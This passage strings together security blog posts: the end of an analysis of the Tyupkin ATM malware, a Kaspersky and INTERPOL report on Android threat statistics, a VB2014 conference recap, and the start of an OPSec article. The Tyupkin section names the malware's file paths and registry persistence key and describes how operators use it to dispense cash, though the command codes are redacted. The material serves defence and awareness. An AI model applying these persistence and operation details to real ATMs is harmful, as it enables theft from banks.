The attackers copied the following files into the ATM:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

After some checks of the environment, the malware removes the .lnk file and create a key in the registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AptraDebug" = "C:\Windows\system32\ulssm.exe"

The malware is then able to interact with ATM through the standard library MSXFS.dll – Extension for Financial Services (XFS).

The malware runs in an infinite loop waiting for user input. In order to make it more difficult to detect, Tyupkin accepts (by default) commands only on Sunday and Monday nights.

It accepts the following commands:

  • XXXXXX – Shows the main window.
  • XXXXXX – Self deletes with a batch file.
  • XXXXXX – Increases the malware activity period.
  • XXXXXX – Hides the main window.

After every command the operator must press "Enter" on the ATM's pin pad.

Tyupkin also uses session keys to prevent interaction with random users. After entering the "Show the main window" command, the malware shows the message "ENTER SESSION KEY TO PROCEED!" using a random seed for each session.

The malicious operator must know the algorithm to generate a session key based on the seed shown. Only when this key is successfully entered that it is possible to interact with the infected ATM.

After that, the malware shows the following message:

CASH OPERATION PERMITTED.
TO START DISPENSE OPERATION -
ENTER CASSETTE NUMBER AND PRESS ENTER.

When the operator chooses the cassette number, the ATM dispenses 40 banknotes from it.

When the session key entered is incorrect, the malware disables the local network and shows the message:

DISABLING LOCAL AREA NETWORK...
PLEASE WAIT...

It is not clear why the malware disables the local network.  This is likely done to to delay or disrupt remote investigations.

Video with a demonstration in a real ATM is available:

Conclusion

Over the last few years, we have observed a major uptick in ATM attacks using skimming devices and malicious software.  Following major reports of skimmers hijacking financial data at banks around the world, we have seen a global law enforcement crackdown that led to arrests and prosecution of cyber-criminals.

The successful use of skimmers to secretly swipe credit and debit card data when customers slip their cards into ATMs at banks or gas stations is well known and has led to a greater awareness for the public to be on the lookout – and take precautions – when using public ATMs.

Now we are seeing the natural evolution of this threat with cyber-criminals moving up the chain and targeting financial institutions directly.   This is done by infecting ATMs directly or direct APT-style attacks against the bank.  The Tyupkin malware is one such example of attackers moving up the chain and finding weaknesses in the ATM infrastructure.

The fact that many ATMs run on operating systems with known security weaknesses and the absence of security solutions is another problem that needs to be addressed urgently.

Our recommendations for the banks is to review the physical security of their ATMs and consider investing in quality security solutions.

Mitigation recommendations

We recommend that financial institutions and businesses that operate ATMs on premises consider the following mitigation guidance:

  • Review the physical security of their ATMs and consider investing in quality security solutions.
  • Change default upper pool lock and keys in all ATMs. Avoid using default master keys provided by the manufacturer.
  • Install and make sure that ATM security alarm works. It was observed that the cyber-criminals behind Tyupkin infected only those ATMs that had no security alarm installed.
  • For the instructions on how to verify that your ATMs are not currently infected in one step, please contact us at intelreports@kaspersky.com. For the full scan of the ATM's system and deleting the backdoor, please use free Kaspersky Virus Removal Tool (you may download it here).
General advice for on-premise ATM operators
  • Ensure the ATM is in an open, well-lit environment that is monitored by visible security cameras. The ATM should be securely fixed to the floor with an anti-lasso device that will deter criminals.
  • Regularly check the ATM for signs of attached third-party devices (skimmers).
  • Be on the lookout for social engineering attacks by criminals who may be masquerading as inspectors or security alarms, security cameras or other devices on premises.
  • Treat intruder alarms seriously and act accordingly by notifying law enforcement authorities of any potential breach.
  • Consider filling the ATM with just enough cash for a single day of activity.
  • For more advices both for merchants and users please visit http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx

Mobile Cyber-threats: A Joint Study by Kaspersky Lab and INTERPOL

Mon, 10/06/2014 - 07:00

 PDF version

International Cooperation to Combat Cybercrime

Cyber-threats, including those targeting mobile devices, are directly linked to cybercrime. In most developed countries, creating and distributing malicious software is a criminal offence. Although such criminal acts are perpetrated in virtual environments, their victims lose real assets, such as personal data and money.

Combating cybercrime is particularly difficult because cybercriminals do not need to cross the borders of other countries to commit crimes in those territories. At the same time, enforcement authorities in these same countries have to overcome numerous barriers in order to administer justice. Therefore, international cooperation between information security experts and law enforcement authorities is required to effectively combat crime in the virtual world. Kaspersky Lab is an international company that brings together IT security experts from all over the world and seeks to provide detailed and highly qualified technical consultations to assist local law-enforcement agencies investigating cybercrime.

To cooperate as effectively as possible against international cybercrime, Kaspersky Lab and the International Criminal Police Organization (INTERPOL) have established a partnership, under which Kaspersky Lab experts will share their expertise in cyber-threat analysis with INTERPOL officers.

This "Mobile cyber-threats" report has been prepared by Kaspersky Lab and INTERPOL within that partnership framework. It aims to evaluate how widespread mobile threats are, and to alert the international IT security and law enforcement community to the problem of crime in the area of mobile communications.

Introduction: The Mobile Leader and Target no. 1

Smartphones and tablets have long been established as popular personal electronics devices. A joint Kaspersky Lab and B2B International survey conducted in the spring of 2014 found that 77% of the Internet users surveyed use several devices to access the World Wide Web; alongside traditional computers, they typically use smartphones and tablets. So what types of smartphones and tablets are used?

According to IDC's Q2 2014 report, the sales of such devices have, for the first time ever, passed the mark of 300,000,000 devices sold per quarter. This is an important milestone in the market that has been growing for several years.

According to the same IDC report, the distribution of operating systems for mobile devices looks like this:

Figure 1. Distribution of mobile operating systems in Q2 2014, according to IDC. Source: IDC

As the diagram shows, nearly 85% of the mobile device market was occupied by Android in Q2 2014. These numbers are an acknowledgement of Android's undisputed leadership among mobile environments. This operating system is free for device manufacturers and can be easily modified to match various business needs, which has helped it achieve popularity among smartphone and tablet developers as well as consumers across the world. This also means that Android-based devices inevitably attract the attention of cybercriminals who are  creating and distributing malicious programs.

Kaspersky Lab experts estimate that 98.05% of all existing mobile malware targets the users of Android devices. So, how much is "all existing malware"? Kaspersky Lab experts report that in the first half of 2014 alone, 175,442 new unique Android malicious programs were detected. That is 18.3% (or 32,231 malicious programs) more than in the entire year of 2013.

For these and other reasons, it is safe to say that that vast majority of mobile cyber-threats are targeting Android.

Figure 2. The distribution of Kaspersky Lab products' malware detections in 2013 between different mobile environments

It is easy to understand why cybercriminals create so many malicious programs targeting Android devices: these days, smartphones are increasingly often used as a tool to pay online for merchandise and services.

Apps can be installed through Google Play as well as third parties such as Amazon App store. Third party apps pose a security threat to users who enable the installation of apps from unverified sources. These unverified packages may carry malware that would be installed on a device without the user's permission or knowledge.

Another danger is the possibility of an attacker gaining access to personal data such as the user's cloud storage accounts and associated email identifiers. This information can be used to access personal content that is stored in cloud base storage without the user's knowledge or permission.

Smartphones can also be regarded as a kind of mobile sensor, since they routinely collect a multitude of personal information about their owners. In other words,  mobile devices users are a very valuable target for cybercriminals.

Figure 3. The scheme of actors involved in cybercrime. Source: INTERPOL

Information is the new currency and this has led to a drastic change in the structure of organized criminal groups, which now support a larger group of actors. The bottom to top approach leaves us with three basic categories (1) The Infectors, (2) The Analysts, and (3) The Investors. The Infectors' role is to mass-propagate and exploit devices as well as pick up data from the devices with very little discrimination about the type of data collected - the more the better. The Analysts' job revolves around studying and processing the data that was collected,  monetizing it by offering it on underground markets, blackmailing individuals or using the information to invest into markets that would eventually allow the criminals to profit from illegally obtained information or insider trading. The  Investors are responsible for funding and providing financial support to the pyramid –obviously they then receive the majority of the profits made over time.

This model has overtaken the lone hacker scenario, which is now merely a media misconception. When it comes to mobile devices, it has been underlined that they can be a greater source of personal or business information than desktop computers. That, coupled with the fact that these devices are often less secure, has caused Infectors to refocus their efforts onto the mobile device sector.

Of course these and other factors have an effect on how often smartphone and tablet users encounter dangerous software while accessing the Internet from their mobile devices.

How much risk is there in being an active Android user, and how can users reduce that risk? Details on this are provided in this report.

Methodology

This study focused on the 12 -period of 1 August 2013 through 31 July 2014. This study period was chosen based on Kaspersky Lab data. Kaspersky Lab began to collect statistics on attacks against Android users in May 2012. During the more than two years that followed, it was the above mentioned time frame that showed that the number of Android threats, the number of attacks and the number of attacked users grew particularly sharply.

Figure 4. Detections by Kaspersky Lab's security products of cyber-attacks on Android devices throughout the entire history of observations. All data sourced from Kaspersky Security Network, unless stated otherwise

Naturally, this dramatic increase partly comes from the increasing numbers of users who purchased Kaspersky Lab's mobile security products. However, this is not the sole, nor even the main factor, behind this growth.

Apart from changes in the numbers of launched attacks and attacked users, this study will also focus on the geographic distribution of attacks and users. Additionally, a list of the most widespread malicious programs for Android will be analyzed.

Data used in this research was sourced from the cloud-based Kaspersky Security Network (KSN), which includes more than 5,000,000 users of Android-based smartphones and tablets protected by Kaspersky Lab products. This research analyzes threat data collected from these devices.

The Main Findings
  • Over a 12 month period, Kaspersky Lab security products reported 3,408,112 malware detections on the devices of 1,023,202 users.
  • Over the 10 month period from August 2013 through March 2014, the number of attacks per month was up nearly tenfold, from 69,000 in August 2013 to 644,000 in March 2014.
  • The number of users attacked also increased rapidly, from 35,000 in August 2013 to 242,000 in March.
  • 59.06% of malware detections related to programs capable of stealing users' money
  • About 500,000 users have encountered mobile malware designed to steal money at least once.
  • Russia, India, Kazakhstan, Vietnam, Ukraine and Germany are the countries with the largest numbers of attacks reported.
  • Trojans designed to send SMSs were the most widespread malicious programs in the reporting period. They accounted for 57.08% of all detections.
  • The number of modifications for mobile banking Trojans increased 14 times over 12 months, from a few hundred to more than 5000.
Part 1: General trends in the evolution of mobile threats

There are those who believe that Android is a secure platform. When confronted with the fact that new Android malware emerges every day, these people often say that those malicious programs are in fact very rare and pose only a limited threat to the owners of Android devices. For a long time, these views have been justified. If we look at the historical course of the number of existing Android threats (see Figure 4), we will indeed see that before the summer of 2013 the numbers of attacks and attacked users were well below 100,000 a month. That looked very modest as compared to PC attack numbers.

However, this situation changed dramatically during the period analyzed in this paper. In the 12 months from August 2013 through July 2014, over 1,020,000 Android users across the globe encountered more than 3,400,000 attacks. That was six times more than the number of attacks in the whole of the previous 1.5 years when records were kept.

Over the reporting period, the number of attacks showed a dramatic growth, increasing nearly 10 times from 69,000 in August 2013 to 644,000 in March 2014. Then there was a sudden fall in activity, down to 216,000 incidents in June.

Figure 5. Number of Kaspersky Lab Android product detections of malware targeting Android devices. August 2013 through July 2014

At the end of the Holiday season, there was no decrease in the activity, despite expectations. Instead, there was a further dramatic spike. The decline only began in April.

The geographic distribution of attacks and attacked users

More than half (52%) of attacks during the study period were reported in Russia. This is primarily due to the fact that Russian residents form a particularly large proportion of the users who agreed to have their statistics sent to Kaspersky Security Network.

Figure 6. Top 15 countries with highest numbers of users attacked between April 2013 and July 2014

Another contributing factor is the wide popularity of various mobile payment services in Russia. These allow users to pay for goods or services by sending premium SMSs. This encourages cybercriminals to create and distribute Android malware exploiting these services.

However, it may be misleading to think that the malware industry is well-developed in Russia and comparatively calm in the rest of the world. Russian-speaking cybercriminals are definitely interested in foreign markets. Two banking Trojans, Faketoken and Svpeng, are vivid examples of such attempts at globalization. These two were created to launch attacks on the clients of foreign banks, and only a few versions target Russian users.

Part 2: The 'Star' Performers

As predicted, the number of attacks increased over time, more malware modifications were detected.

Figure 7. Number of modifications of Android malicious applications, as detected by Kaspersky Lab in August 2013 – July 2014

This number rose by a factor of nearly 3.4 over the year, from 120,500 malware modifications in August 2013 to 410,800 in July 2014.

For the study period the top 10 most widespread malware are mostly malicious programs from the Trojan-SMS type – these accounted for 57.08% of all attacks. Following that, RiskTool programs, accounting for 12.52% detections. These are nominally legitimate programs that can also be used for malicious purposes, such as sending SMS with a visual notification of the user, transmitting geo-data etc. Aggressive advertising software (adware) came in third (7.37%.)

Figure 8. Distribution of attacks by malware types: Top 10 most active malware types. August 2013 – July 2014

These overall statistics are affected by the large number of Russian users and the popularity of SMS payments in Russia. To eliminate any possible "Russian" bias, we also looked at the cyber-threat landscape described without data collected from users in Russia.

Figure 9. Distribution of attacks by malware types, excluding data from Russian users. August 2013 – July 2014

As can be seen in the diagram, the numbers have changed. However, the overall situation remains broadly similar: Trojan SMS is still the most widespread type of malware. Below is a graph showing the Top 10 countries with the largest numbers of reported attacks involving Trojan SMS malware:

Figure 10. Top 10 countries with the largest numbers of reported attacks involving Trojan-SMS malware. August 2013 – July 2014

Attacks involving Trojan-SMS malware are most frequent in Russia. Residents of Kazakhstan, Ukraine, the UK, Spain, Vietnam, Malaysia, Germany, India, France and other countries also encounter attacks involving this type of malware.

Malware created with the sole aim of stealing money from victims (i.e. Trojan-SMS and Trojan-Banker malware types) accounted for 59.06% of attacks and was reported on the devices of 49.28% of users during the study period. In absolute numbers that represents half a million users who agreed to have their statistics on detected threats sent to KSN.

It is hardly surprising that cybercriminals actively use financial Trojans. As reported in a B2B International report , 53% of polled smartphone and tablet users say they use the devices to pay online. In other words, theoretically cybercriminals can potentially make money on every second user of a mobile device. Statistics show that approximately every second user is indeed attacked by cybercriminals.

Legitimate surveillance

Approximately 2.72% of all detections, or 92,600 detections, involved "Monitor" class programs. In Kaspersky Lab's classification, this stands for conditionally legitimate applications designed to conduct surveillance over smartphone users. These applications can track the user's location, read his/her messages, and access other personal information. The manufacturers of such software advertise it as a useful tool to help look after children and the elderly, but Kaspersky Lab classifies it as insecure. A total of 41,400 users encountered such applications in the 12-month period. On average, each of these users encountered such programs twice.

Interestingly, the geographical distribution of these programs is noticeably different from the overall global distribution of malware detections.

Figure 11. The geographical distribution of detected "legitimate" spyware in the "Monitor" class. August 2013 – July 2014

India is in first position with 19.73% of all detections. Russia is in second place with 14.72% of all detections (even though it is the leader of the general threat ranking). Users in the USA also quite often encounter these applications (7.59% detections); followed by the UK (6.8%) and Germany (4.56%). Kaspersky Lab experts have no reason to assume all these detection cases are attempts to secretly install these programs on a device protected by a Kaspersky Lab product. However, this scenario is possible, so Kaspersky Lab security products detect Monitor-class programs as potentially dangerous.

Part 3: Trojan-SMS and the 'Legitimate' Business of Affiliate Programs

During the reporting period, 452 different modifications of 62 different Trojans capable of using SMS messaging were detected.

Figure 12: Distribution of attacks involving the most widespread SMS Trojans during the period from August 2013 to July 2014

Malware from the Agent family had the largest proportion of detection (28.57%), followed by FakeInst (22.4%) in second place and Stealer (21.59%) in third.

According to Kaspersky Lab experts, affiliate programs are one of the most common ways of delivering malicious code.

A typical setup for a malicious affiliate program is as follows: a group of cybercriminals creates an affiliate website and invite Internet users to become their accomplices and make money by distributing a malicious program. A unique modification of the malware and a landing page from which it will be downloaded to victims' devices is created for each user who agrees to take part. After that, participants of the affiliate program buy Internet traffic from third parties or bring in users by redirecting requests from compromised websites, displaying banners on popular Web resources or creating their own sites and promoting them using search-engine optimization. The objective is to have as many Android users as possible visit the page hosting the malicious application. After each successful installation, the newly-infected device starts sending SMS messages to premium numbers, making money for the cybercriminals. Part of that money is paid to the affiliate partners. Criminal groups that sell Web traffic usually resort to various social engineering techniques, attracting users with pornography, free games, etc..

According to Kaspersky Lab experts, about 38% of users who end up on these landing pages will download malicious apps from them. About 5% of users go on to install these applications. Cybercriminals can earn millions of dollars in net profits from this activity.

During the study period, Kaspersky Lab experts observed at least four large active affiliate programs, accounting for about one quarter of all attacks recorded over that time. All of these affiliate programs were primarily active in Russia and countries of the former Soviet Union, but each program used a different family of SMS Trojans.

Figure 13: Activity of four affiliate programs distributing Android malware from August 2013 to July 2014

In the beginning of the period under consideration, there were three 'leaders' in this market: Fakeinst.am, Opfake.bo and Opfake.a, of which Opfake.bo was the most active and successful. However, the situation changed radically in October 2013 with the appearance of a new player – Stealer.a. It was different from competing malware in that it had more extensive functionality and spread very actively. By November 2013 it was the most frequently detected affiliate program and remained at the top throughout the rest of the research period.

2014: bad news for malicious affiliate programs

The abovementioned attacks conducted using SMS Trojans were different from typical malicious campaigns targeting PCs in one important respect. Legitimate legal entities, mostly registered in Russia, were involved in distributing Android Trojans and profited from the consequences of infecting smartphones. The business model of affiliate programs that distribute applications and premium content is not illegal, but there is indirect evidence that the companies behind some of the affiliate programs described above worked with cybercriminals as well as those who distribute legitimate content and apps.

This situation continued for a long time, because neither the heavy penalties issued by mobile-phone operators for mounting fraud campaigns nor criminal liability for distributing malware managed to stop cybercriminals or the organizations that worked with them. However, everything changed in early 2014: shortly before changes in legislation aiming, among other things, to curtail SMS fraud came into effect, mobile-phone operators adopted an Advice of Charge (AoC) mechanism. Every time a customer (or an SMS Trojan) attempts to send a message to a premium number, the operator notifies the customer how much the service will cost and requests additional confirmation from the user.

Early in the year the mechanism was applied to selected types of premium SMS services and as of May 1, 2014 a new law made it obligatory for mobile-phone operators to notify their customers of any attempts to start any mobile subscription. This coincided with a radical fall in the number of attacks involving SMS Trojans.

The major surge in the number of attacks, particularly those involving Stealer.a, could have been an attempt to make as much money as possible before AoC was universally adopted. Kaspersky Lab experts observed that in spring 2014 the three affiliate programs which distributed Fakeinst.am, Opfake.bo and Opfake.a stopped active operation. Kaspersky Lab experts have no reason to believe that the three affiliate programs have run out of steam completely, but they lack their earlier vigor and the reduced number of attacks involving SMS Trojans is a good, albeit indirect, indication of this.

The most active program of the four – the one distributing Stealer.a – has also lost a lot of ground in terms of the number of attacks, but users often still come across versions of this malicious app.

Curiously, although all these affiliate programs were set up and maintained by Russian-speaking cybercriminals and their scams mostly targeted users from Russia and the former Soviet Union, parts of Europe saw fewer attacks involving SMS Trojans in spring, too.

Figure 14: Changes in the number of attacks involving Trojan-SMS in European countries where Kaspersky Lab products detected this type of malware from April to June 2014

The diagram above shows data about attacks involving Trojan-SMS in the European countries in the Top 10 for attacks using Trojan-SMS. The diagram shows that four of the five countries which ranked among those attacked most often have seen the number of attacks fall.

Towards the end of the period there was also a slight growth in the number of attacks in Germany by Agent.ao malware, which was distributed by an affiliate program primarily targeting that country. All other affiliate programs which had been active in Europe and Asia were noticeably less active.

Figure 15: Attacks involving Agent family Trojans from August 2013 to July 2014

In other words, the number of attacks was falling almost everywhere in the post-Soviet space, in Europe and in Asia.

This may be due to two reasons. First, cybercriminals wind down their activity during the vacation season, which begins in spring. Additionally, the Russian legislative developments described above may also have contributed to the decline. Kaspersky Lab experts have frequently observed that Russian-speaking developers of Android malware have global ambitions and adapt their malware, including Trojan-SMS, to attack markets where languages other than Russian are spoken. However, the number of detections recorded outside the post-Soviet space has always been significantly smaller than in Russia and its neighbors – in other words, it is unlikely that most distant targets brought much money to the owners of affiliate programs based in Russia. So when the main 'players' in a Russian segment of Android malware wound down their activity, this naturally resulted in the closure of their foreign 'projects'.

Admittedly, Kaspersky Lab experts do not have the solid evidence needed to confirm this theory, though if it is it would be an example of how anti-fraud measures in one country can have a beneficial effect – albeit a small one – elsewhere in the world.

Mobile banking Trojans: dangerous trends

A total of 67,500 attacks involving Trojan-Banker malware against 37.7 thousand users were recorded in the analysis period. Trojan-Banker is a type of malware designed to steal online banking credentials. The total number of banking Trojans targeting mobile devices grew from 423 in August of 2013 to 5,967 in July 2014. That is a more than 14-fold increase!

Figure 16: Changes in the number of attacks and users attacked by Trojan-Banker malware from August 2013 to July 2014

However, even though there were more malware variants, the decline in the use of Trojan-SMS malware also affected Trojan-Bankers. This was primarily because one of the banking Trojans was distributed using the same affiliate networks as Trojan-SMS malware.

Figure 17: Geographical distribution of users affected by Trojan-Banker on Android from August 2013 to July 2014

The overall downward trend was sparked by the Faketoken Trojan-Banker, which could steal one-time passwords sent to confirm bank transactions and operated in conjunction with 'desktop' banking Trojans.

Figure 18: Attacks involving Faketoken, compared to all attacks involving mobile banking Trojans from August 2013 to July 2014

As the diagram above shows, from August to March Faketoken was virtually the only widespread mobile banking Trojan. However Faketoken was distributed by one of the affiliate networks that wound down in April 2014 and from that time it too began to dwindle. Subsequently the overall number of mobile banker detections remained at a higher level than Faketoken and showed a small increase in overall attack numbers.

This rising trend was led by two other programs targeting online banking users – Svpeng and Marcher.

Figure 19: Changes in the number of attacks involving Marcher and Svpeng banking Trojans from March to July 2014

As the diagram shows, the number of attacks involving Svpeng fell from late May to late June; however, in June Kaspersky Lab experts discovered a new Svpeng variant. Previously it was a mostly 'Russian-speaking' and exclusively 'banking' Trojan, but in its new variant Svpeng acquired ransomware Trojan functionality. It displayed messages saying the phone was blocked and demanding several hundred dollars to unblock it. Analysis of the content used by the malware has demonstrated that US users were its main targets.

As for Marcher, at first glance it seems to be just one more 'Russian' banking Trojan – 98.84% of users affected by it live in Russia. However, when Kaspersky Lab experts analyzed the Trojan's code they found that the objectives pursued by the Trojan are not quite so obvious.

After infecting a device, the malware tracks the launch of just two apps. If the user starts Google Play, Marcher displays a false window requesting credit card data.

Initially, Marcher was only able to attack Google Play users, but in March 2014 Kaspersky Lab experts discovered a variant that targeted the mobile client of a large German bank's online banking system. If the user launches the bank's mobile banking client, another fake window displays fields for user credentials for the online banking system.

Although so far users of Kaspersky Lab mobile products in Germany have not encountered this threat, this situation may change in the future. Kaspersky Lab experts will track the evolution of this and other dangerous Android threats.

Other Threats: Bitcoin Miners and Ransomware Bitcoin Mining Malware on Mobile – notable mention

In April 2014, Google Play removed a new category of malware applications that were directly aiming at mining crypto-currencies. "BadLepricon" malware, one of the first to be detected was masquerading as a fully operational live wallpaper application. Infected mobile devices were overheating once the hidden process of crypto-mining currencies was triggered. Even though the processing power of a single mobile device was quite minimal and not really an effective miner, it is estimated that a massive infection of devices could contribute to big profits for the actors managing the malware.

There have been further reports and detections from the Anti-Virus community, some of which indicated that similar malware applications were released on the Google Play market and had over one million downloads, raising serious questions on the profitability of that model. Even though the malware does not target personal information, this type of malware still falls in the category of unauthorized access to a personal device, which makes it illegal to use an individual's machine without the owner's prior consent. It is expected that further variants of crypto-mining malware will emerge in the coming months, possibly focusing on mining altcoins or the family of clonecoins, which are easier to mine than bitcoins at this stage.

Crypto-ransomware finds its way to Android

Crypto-ransomware refers to a class of malware that infects a machine then encrypts targeted files with specific extensions and demands payment before providing the key to decrypt the files. Crypto-ransomware found its way to Android OS in 2014 after gaining a reputation as a growing problem for Internet security companies and law enforcement in general.

Simplelocker A, a piece of crypto-ransomware tailored for Android, was the focus of research by INTERPOL. This variant uses AES-256 to encrypt the data within specific file extensions hosted on the SD card of a mobile device, making it impossible to access the files. More interestingly, the malware itself communicates with its C&C servers by routing to an onion on the Tor Network for further anonymity. Simplelocker.A has been mainly targeting Russian speaking countries. However, security experts believe that it is only a proof of concept with a far more developed, mature and complicated version expected to surface soon in Google Play.

Conclusions and Recommendations

The data analyzed in this study shows that mobile cybercrime is an extremely widespread phenomenon across the globe. It's important to remember that the study only reflects data on users protected against mobile malware and can only give a general idea of the extent to which different threats are widespread and dangerous.

One thing that is certain is that the number of threats is growing and the damage that can be caused by them, potentially, runs to millions of dollars.

Another conclusion is that the cybercriminals involved in distributing malware which targets mobile device users commit their crimes outside the borders of the countries where they live.

It is obvious that the problem needs to be addressed by IT security experts and law enforcement agencies in the countries where the perpetrators presumably reside, not only in those countries where their crimes are perpetrated. Security solutions can simply block the threats on user devices, but the criminals will simply find other victims who are not so well protected. The only thing that can stop them is the involvement of law enforcement organizations.

To avoid falling victim to cybercriminals involved in distributing mobile malware, Kaspersky Lab and INTERPOL experts recommend the following security measures:

For individual users:
  • Protect your Android devices with secure passwords to prevent attackers from accessing personal data by stealing your device and brute-forcing the password.
  • Unblocking the option that enables apps from third-party sources to be installed on the device is not a good idea. As a rule, Google Play, which is the main distribution channel for Android apps, carefully verifies the software it distributes. Even if you need to use a third-party application for some reason, be sure to block this option again after installing the app.
  • Antivirus software developers often create applications designed to test devices for unclosed vulnerabilities. Such applications are regularly updated to include data on newly-discovered vulnerabilities. We recommend using these apps once in a while.
  • Use a security solution on your device and make sure it scans files as they are downloaded and protects the device from other types of Internet attacks. Although Android malware has not so far been as widespread as malicious software targeting PCs, this thought is unlikely to comfort you if you fall victim to mobile malware.
  • When conducting banking transactions, be sure to use two-factor authentication. Ideally, temporary codes used to access your bank account should be sent to a different phone from the one from which you connect to online banking. Using simple devices with no smartphone features for this purpose is recommended, since this minimizes the chances of these devices being infected with a banking Trojan. And, generally, it is a good idea to use two-factor authentication wherever possible.
  • You should use encryption if you have any valuable information (financial, personal or work-related) on your device. Then, even if your device is stolen, the attackers won't be able to access your data.
  • If you believe that you may have fallen victim to or witnessed a cybercrime, do not hesitate to contact law enforcement as soon as possible. In most countries, creating and distributing malware or stealing personal information is a crime that is investigated by dedicated law enforcement agencies.
For corporations:
  • The Bring Your Own Device approach, which allows employees to use their personal devices for work, can expose your company to virtually all 'consumer' IT security risks: sensitive corporate data stored on an employee's personal phone could be a valuable find for cybercriminals. A security solution with Mobile Device Management capabilities, including encryption and remotely wiping data from smartphones, will help you to keep your sensitive business-related information secure.
  • If your employees are not aware of simple IT security rules, this is likely to cause security incidents. This is why, in an environment where nearly all the employees have Internet-enabled devices, training people to handle their mobile devices appropriately will be a worthwhile investment.
  • Be sure to contact law enforcement and expert organizations in the event of an IT security incident. Many companies keep information about incidents secret for fear of reputational losses and do not initiate investigations into cybercriminal activities. However, a cybercriminal who escapes prosecution is free to come back and cause even greater damage in future.
For law enforcement and regulatory agencies
  • There are many highly-qualified experts in digital forensics and malware analysis, whose participation in cybercrime investigations could speed up the process of collecting evidence and searching for suspects and make it more effective.
  • Today, cybercriminals launch attacks against people in other countries without fear, taking advantage of the many jurisdictional issues that beset international multi-jurisdictional investigations. The more effectively cyber police forces of different countries work together, the harder it will be for cybercriminals to avoid liability.
Note on Responsible Distribution of Information

This document presents an analysis of the cyber-threat landscape as it relates to Android-based mobile platforms. It is based on information about instances of Kaspersky Lab security products detecting applications considered insecure or malicious due to their functionality. To avoid possible misinterpretation of the facts presented in this document, Kaspersky Lab would like to highlight a number of issues related to the way this report was prepared.

1. Terminology

The report uses several terms describing how a security product interacts with malicious software. The term "Attack" is among those used most frequently. In Kaspersky Lab's terminology, an attack is an instance of a security product detecting any software considered malicious on the protected device, regardless of whether an attempt to execute malicious code was detected. The term "User" denotes exclusively the owner of the device protected by Kaspersky Lab's product.

2. Dataset and its geographical distribution

All calculations and conclusions made in this study rely on data from Kaspersky Lab's mobile customer community, which exceeds 5 million users in over 200 countries and territories. It should be emphasized that the number of Kaspersky Lab's product users varies from country to country, so the results of this study may not fully reflect the situation existing in some countries. However, many years' experience of monitoring the statistics collected by Kaspersky Security Network (KSN) shows that in most cases KSN data is about 95% accurate concerning the prevalence of specific cyber-threats or cyber-threat classes, and concerning on the percentage distribution of consumers using devices running different operating systems. It also correlates very well with data received from other sources, namely from companies which specialize in collecting and analyzing statistical data.

Responsible distribution of information

This study can be freely shared or distributed. Kaspersky Lab requests that those who find the information presented in this document interesting and useful make allowances for the abovementioned issues related to the ways in which KSN statistics are collected when preparing public materials in which this information is to be used.

Virus Bulletin 2014: new times, same challenges

Fri, 10/03/2014 - 09:11

During the last week of September the antimalware industry got together in one of the oldest and most legendary information security conferences in the world, the 24th Virus Bulletin International Conference (VB2014), held in the beautiful Seattle, USA. Kaspersky Lab was there to present and share a wide range of ongoing research topics with the security community.

In the first day of the conference we were shown over and over how the Linux operating it's not so malware free any more. Dismantling the myth, we had several talks on the topic, amongst them "Ebury and CDorked. Full disclosure" and "Linux-based Apache malware infections: biting the hand that serves us all" brought attention to non-traditional malware, and how the Apache web server is caught in the middle of this *nix world, becoming an efficient platform for attacking and infecting unsuspecting clients.

My colleague Santiago Pontiroli presented about the current "bitcoin bonanza" and how cybercrime is quickly targeting cryptocurrencies and their users. While sharing some of the most interesting malware samples that target bitcoin and other alternative currencies, the audience got an overview of the benefits that digital currencies offer to Latin American countries and the reasons behind criminals' activity.

The icing on the first day's cake was the presentation shared by Patrick Wardle who covered "Methods of malware persistence on Mac OS X", again showing us that not everything in the malware ecosystem is about Microsoft.

With so many good talks to attend in the second day, sometimes making the right decision was rather difficult. A very interesting presentation by Jérôme Segura, regarding Technical Support Scams, demonstrated in detail how to build a honeypot to catch these scammers while emphasizing the importance of user awareness and education.

I presented a one year research about the attacks against "boletos", an old and very popular payment system from Brazil based in printed documents and a barcode, showing how local bad guys have adapted their trojans to change them, redirecting payments to their accounts, and stealing millions of dollars in the process.

It was the turn for my colleague David Jacoby to present an extremely funny (yet informative) presentation on how he hacked his own home, exploiting different vulnerabilities on networked devices such as Smart TVs, printers, NAS, etc. Interactively demonstrating how exposing these devices to attacks would mean compromising an entire home network, all the presentation was displayed with funny GIFs and (interestingly enough) the slides were hand crafted with MS Paint.

Security Researchers from Microsoft gave us a run down on .NET malware analysis with their last minute paper ".NET malware dynamic instrumentation for automated and manual analysis". As malware developers are increasingly relying on high level programming languages for their malicious creations, tools like the one presented in this talk will become essential for malware analysts looking to become proficient in .NET malicious applications study.

And the last Kaspersky presentation was from Vicente Diaz on "OPSEC for security researchers". Working as a security researcher nowadays is not an easy task, especially now that we no longer deal only with technical aspects. The global picture of the security landscape these days features new actors including governments, big companies, criminal gangs and intelligence services. That puts researchers in some tricky situations.

The closing panel was funny and informative, with David Jacoby bringing awareness to the community on how disclosure of important vulnerabilities (like Heartbleed, and now the infamous Shellshock) should be handled, and what roles do vendors play in this scenario. After the keynote address by Katie Moussouris of HackerOne on "Bounties and standards and vuln disclosure, oh my!", the final panel left us with a cohesive feeling for the conference, bringing into the spotlight what the industry as a whole should be facing in terms of vulnerabilities disclosure and the same challenges we had to protect connected devices, the Internet of Things, crypto currencies and payment systems.

Times change but the same challenges remain, one thing is clear, we are still here to protect the user and fight against cybercrime.

OPSec for security researchers

Fri, 10/03/2014 - 07:00

Being a security researcher nowadays is no easy task, especially as we are no longer dealing with purely technical matters. Today's global security landscape includes several new actors including governments, big companies, criminal gangs and intelligence services. This puts researchers in a difficult situation.

According to one of many definitions of OPSec:

"Operational security identifies critical information to determine if friendly actions can be observed by adversaryintelligence systems"

We are hearing reports of researchers facing threats from criminal gangs, or being approached by state intelligence services. Others have found themselves under surveillance or had their devices compromised when on the road.

How can we minimize these risks? What can we do to avoid leaking information that could put us in an uncomfortable situation in the future?

Sometimes we are the public faces of a research project, but at other times we don't want to be in a visible position.

The golden rule in Operational Security is using silence as a defensive discipline. If you don't really need to say something, then keep quiet. When you need to communicate with someone, do it in a secure way that doesn't compromise the content of your message and, if possible, doesn't generate metadata around it.

This is an incredibly difficult objective to accomplish: it's a natural instinct to want to impress others and on many occasions we will face adversaries who are well trained in obtaining the information that they want. We all like to tell interesting stories.

